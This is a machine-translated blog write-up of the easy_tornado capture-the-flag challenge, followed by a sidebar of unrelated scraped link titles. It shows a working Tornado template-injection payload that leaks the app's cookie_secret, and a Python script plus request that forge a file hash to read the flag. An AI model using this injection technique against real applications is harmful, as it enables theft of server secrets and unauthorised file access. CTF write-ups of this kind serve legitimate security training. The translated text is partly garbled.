当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllag
Find out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
render
render yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.
handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()
payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
Succeed in getting flag.
边栏推荐
- Open source ecosystem | create a vibrant open source community and jointly build a new open source ecosystem!
- 2022 National latest fire-fighting facility operator (primary fire-fighting facility operator) simulation questions and answers
- [step on the pit series] H5 cross domain problem of uniapp
- 互动送书-《Oracle DBA工作笔记》签名版
- 【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
- Fast parsing intranet penetration escorts the document encryption industry
- Implementation of replacement function of shell script
- 拓维信息使用 Rainbond 的云原生落地实践
- C语言队列
- Roulette chart 2 - writing of roulette chart code
猜你喜欢
央视太暖心了,手把手教你写HR最喜欢的简历
2022 National latest fire-fighting facility operator (primary fire-fighting facility operator) simulation questions and answers
LeetCode简单题之字符串中最大的 3 位相同数字
[quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
QT learning 26 integrated example of layout management
【数字IC验证快速入门】11、Verilog TestBench(VTB)入门
通俗易懂单点登录SSO
[quick start of Digital IC Verification] 15. Basic syntax of SystemVerilog learning 2 (operators, type conversion, loops, task/function... Including practical exercises)
buureservewp(2)
Call pytorch API to complete linear regression
随机推荐
Avatary的LiveDriver试用体验
Unityhub cracking & unity cracking
Qinglong panel -- finishing usable scripts
Leetcode simple question: find the K beauty value of a number
Linux server development, detailed explanation of redis related commands and their principles
JS quick start (I)
Bugku CTF daily one question chessboard with only black chess
offer收割机:两个长字符串数字相加求和(经典面试算法题)
Linux server development, redis source code storage principle and data model
Notes on PHP penetration test topics
[quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
[step on the pit series] H5 cross domain problem of uniapp
Introduction to basic components of wechat applet
Roulette chart 2 - writing of roulette chart code
Myabtis_Plus
These five fishing artifacts are too hot! Programmer: I know, delete it quickly!
ROS bridge notes (05) - Carla_ ackermann_ Control function package (convert Ackermann messages into carlaegovehiclecontrol messages)
The largest 3 same digits in the string of leetcode simple question
JSON data flattening pd json_ normalize
漏洞复现-easy_tornado